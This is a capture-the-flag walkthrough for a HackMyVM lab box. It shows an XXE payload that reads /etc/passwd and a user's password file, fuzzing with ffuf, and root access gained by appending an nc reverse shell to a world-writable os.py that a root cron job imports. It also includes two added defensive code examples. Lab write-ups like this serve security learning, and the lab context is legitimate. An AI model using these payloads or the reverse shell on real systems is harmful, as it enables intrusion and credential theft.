HackmyVM-system


Information gathering

Find the target with `arp-scan`:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:72:be:a6 PCS Systemtechnik GmbH
192.168.31.141 08:00:27:27:28:54 PCS Systemtechnik GmbH
```

192.168.31.141 is the target's IP.

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.141
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 03:39 EDT
Nmap scan report for 192.168.31.141
Host is up (0.0029s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:27:28:54 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
```

Port 80

There is a login page. Inspecting the request shows that the credentials are sent as XML:

```xml
<?xml version="1.0" encoding="UTF-8"?><details><email>123@123.com</email><password>123</password></details>
```

Let's try XXE injection. An external entity pointing at /etc/passwd is declared in the DTD and referenced from the email field:

```xml
<!DOCTYPE test [
<!ENTITY test1 SYSTEM "file:///etc/passwd">
]><details><email>&test1;</email><password>123</password></details>
```
The server echoes the expanded entity back in its response:

```
<p align='center'> <font color=white size='5pt'> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
david:x:1000:1000::/home/david:/bin/bash
is already registered! </font> </p>
```
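The root cause on the server side is an XML parser that resolves DTD entities from a request body. As an added example (not code from the writeup or the box), here is how the same `<details>` login document could be parsed safely: any DOCTYPE or ENTITY declaration aborts parsing before an entity can be resolved. The sample bodies are constructed from the requests shown above; `parse_login`, `reject_dtd` and `UnsafeXML` are names chosen here.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

class UnsafeXML(ValueError):
    """Raised when the request body carries a DTD (DOCTYPE or ENTITY)."""

def reject_dtd(body: str) -> None:
    """Fail before any entity can be resolved: a login document has no
    legitimate reason to declare a DOCTYPE or an entity at all."""
    parser = xml.parsers.expat.ParserCreate()
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE not allowed in login body")
    def on_entity(*args):
        raise UnsafeXML("ENTITY declaration not allowed in login body")
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(body, True)

def parse_login(body: str) -> dict:
    """Return {'email': ..., 'password': ...} from a <details> document."""
    reject_dtd(body)
    root = ET.fromstring(body)
    if root.tag != "details":
        raise ValueError("unexpected root element %r" % root.tag)
    fields = {}
    for name in ("email", "password"):
        node = root.find(name)
        if node is None or node.text is None:
            raise ValueError("missing <%s>" % name)
        fields[name] = node.text
    return fields

# Constructed sample bodies: the normal login and the XXE probe from the writeup.
NORMAL = ('<?xml version="1.0" encoding="UTF-8"?>'
          '<details><email>123@123.com</email><password>123</password></details>')
XXE = ('<!DOCTYPE test [ <!ENTITY test1 SYSTEM "file:///etc/passwd"> ]>'
       '<details><email>&test1;</email><password>123</password></details>')

def demo() -> tuple:
    """(parsed normal login, True if the XXE probe was refused before parsing)."""
    ok = parse_login(NORMAL)
    try:
        parse_login(XXE)
        refused = False
    except UnsafeXML:
        refused = True
    return ok, refused
```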

Reading david's SSH private key and trying to log in with it fails, but fuzzing file names under /home/david shows there is also a .viminfo file:

```shell
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u http://192.168.31.141/magic.php  -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/david/FUZZ"> ]> <details><email>&xxe;</email><password>das</password></details>' --fw 11
```
```
# This viminfo file was generated by Vim 8.2.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:wq!
|2,0,1648909714,,"wq!"

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# Password file Created:
'0 1 3 /usr/local/etc/mypass.txt
|4,48,1,3,1648909714,"/usr/local/etc/mypass.txt"

# History of marks within files (newest to oldest):

> /usr/local/etc/mypass.txt
* 1648909713 0
" 1 3
^ 1 4
. 1 3
+ 1 3
```

Then read /usr/local/etc/mypass.txt through the same XXE.

david's password is h4ck3rd4v!d

Privilege escalation

Upload pspy64 and watch the process list: suid.py is run by root every so often.

```
2025/04/18 04:01:01 CMD: UID=0     PID=670    | /bin/sh -c /usr/bin/python3.9 /opt/suid.py
```
```python
#suid.py
from os import system
from pathlib import Path

# Reading only first line
try:
    with open('/home/david/cmd.txt', 'r') as f:
        read_only_first_line = f.readline()
    # Write a new file
    with open('/tmp/suid.txt', 'w') as f:
        f.write(f"{read_only_first_line}")
    check = Path('/tmp/suid.txt')
    if check:  # a Path object is always truthy, so this branch is always taken
        print("File exists")
        try:
            # only `system` was imported, not `os`, so this raises NameError
            os.system("chmod u+s /bin/bash")
        except NameError:
            print("Done")
    else:
        print("File not exists")
except FileNotFoundError:
    print("File not exists")
```

This script never reaches the chmod: it imports `system` from `os` but calls `os.system`, and the resulting NameError is caught and swallowed. So instead, check whether one of the modules it imports can be hijacked:

```
python3 -c 'import sys; print(sys.path)'
['', '/usr/lib/python39.zip', '/usr/lib/python3.9', '/usr/lib/python3.9/lib-dynload', '/usr/local/lib/python3.9/dist-packages', '/usr/lib/python3/dist-packages']
david@system:/usr/lib/python3.9$ find ./ -writable 2>/dev/null
./os.py
```
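The `find ./ -writable` check above is the attacker's view of the problem. As an added example (not from the writeup), here is the same audit from the defender's side: walk every `sys.path` entry of the interpreter that root's cron job uses and report modules an unprivileged uid could modify, or replace because their directory is writable. That is exactly the condition that lets a world-writable `/usr/lib/python3.9/os.py` turn `/opt/suid.py` into root code execution. The directory layout in `demo()` is constructed, and uid -1 stands in for a user that owns nothing; `hijackable` and `writable_by` are names chosen here.

```python
import os
import stat
import tempfile

def writable_by(st: os.stat_result, uid: int, gids: set) -> bool:
    """Could a process running as uid/gids write an object with these stat bits?"""
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)

def hijackable(search_paths, uid: int, gids: set) -> list:
    """Return .py files under the import paths that `uid` could modify, either
    directly or by replacing them inside a directory it can write to. The empty
    entry (current working directory) is reported as-is: it is always suspect."""
    hits = []
    for entry in search_paths:
        if entry == "":
            hits.append("<cwd> (empty sys.path entry)")
            continue
        if not os.path.isdir(entry):
            continue
        for root, _dirs, files in os.walk(entry):
            dir_writable = writable_by(os.lstat(root), uid, gids)
            for name in files:
                if not name.endswith(".py"):
                    continue
                path = os.path.join(root, name)
                if dir_writable or writable_by(os.lstat(path), uid, gids):
                    hits.append(path)
    return sorted(hits)

def demo() -> list:
    """Constructed stand-in for /usr/lib/python3.9: a world-writable os.py next
    to a normal module. uid -1 models an unprivileged user that owns nothing."""
    with tempfile.TemporaryDirectory() as lib:
        for name, mode in (("os.py", 0o666), ("good.py", 0o644)):
            path = os.path.join(lib, name)
            with open(path, "w") as f:
                f.write("# placeholder module\n")
            os.chmod(path, mode)
        os.chmod(lib, 0o755)
        return [os.path.relpath(p, lib) for p in hijackable([lib], -1, set())]

if __name__ == "__main__":
    # Real audit: run on the host, passing the cron interpreter's sys.path
    import sys
    print(hijackable(sys.path, 1000, {1000}))  # david is uid/gid 1000 on the box
```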

Append the following to the end of os.py:

```python
import subprocess

def shell():
    # executed by root the next time the cron job imports os
    subprocess.call("nc 192.168.31.129 9999 -e /bin/bash", shell=True)

shell()
```

Then listen on that port and wait for the shell to come back.

```
id
uid=0(root) gid=0(root) groups=0(root)
```